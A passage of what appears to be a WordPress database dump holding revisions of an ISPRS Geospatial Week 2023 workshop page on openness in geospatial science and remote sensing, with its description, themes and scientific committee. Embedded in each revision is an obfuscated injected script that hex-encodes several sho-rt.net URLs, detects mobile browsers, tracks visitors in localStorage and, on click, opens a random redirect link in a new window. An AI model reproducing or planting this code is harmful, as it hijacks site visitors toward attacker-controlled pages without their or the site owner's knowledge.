_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:07:06','2023-01-01 19:07:06','',3497,'https://gsw2023.com/?p=3514',0,'revision','',0),
(3515,1,'2023-01-01 19:09:41','2023-01-01 19:09:41','<p>[vc_row][vc_column][vc_single_image image=\"3499\" img_size=\"600x600\"][vc_column_text]</p>\n<h5><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Openness in Geospatial and Remote Sensing</strong>','','inherit','closed','closed','','3497-revision-v1','','','2023-01-01 19:09:41','2023-01-01 19:09:41','',3497,'https://gsw2023.com/?p=3515',0,'revision','',0),
(3516,1,'2023-01-01 19:11:00','2023-01-01 19:11:00','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3499\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II <em>Openness in Geospatial Science and Remote Sensing</em>. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 